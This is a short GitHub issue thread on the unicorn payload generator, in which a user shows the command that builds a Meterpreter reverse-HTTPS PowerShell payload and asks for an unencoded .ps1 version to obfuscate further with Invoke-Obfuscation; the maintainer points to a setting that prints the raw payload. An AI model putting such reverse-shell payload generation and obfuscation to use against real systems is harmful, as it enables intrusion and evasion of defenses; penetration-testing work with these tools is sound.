### ISSUE TITLE
powershell meterpter https .ps1 script payload

### ISSUE THREAD

**Issue by sash322** [trustedsec/unicorn#92]
**PS Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443**
Can you please make it possible to generate a clean psh .ps1 script payload, not oneliner with base64 enc. 
Or please open the decryption of base64 so that I could later use the invoke_obfuscation framework.
With powershell empire it very easy to do, but generation msf powershell payload with meterpreter and https not easy task

**Comment by trustedsec** [comment]
I added an option just now, if you edit unicorn.py and change PRINT_DECODED="OFF" to PRINT_DECODED="ON", this will print out the raw payload for you. Enjoy!
